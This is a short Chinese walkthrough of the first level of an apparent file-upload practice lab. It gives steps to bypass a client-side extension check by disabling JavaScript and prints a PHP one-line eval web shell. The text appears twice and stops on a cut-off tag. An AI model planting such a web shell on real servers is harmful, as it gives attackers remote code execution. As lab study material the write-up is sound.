第一关
1、审计源码,可以看到允许上传的文件类型有.jpg、.png、.gif
2、看页面,关掉js
F12里的调试器,右上角设置里禁用
3、构造一句话木马,要php格式
<?php
@eval($_GET[123]);
?></
1、审计源码,可以看到允许上传的文件类型有.jpg、.png、.gif
2、看页面,关掉js
F12里的调试器,右上角设置里禁用
3、构造一句话木马,要php格式
<?php
@eval($_GET[123]);
?></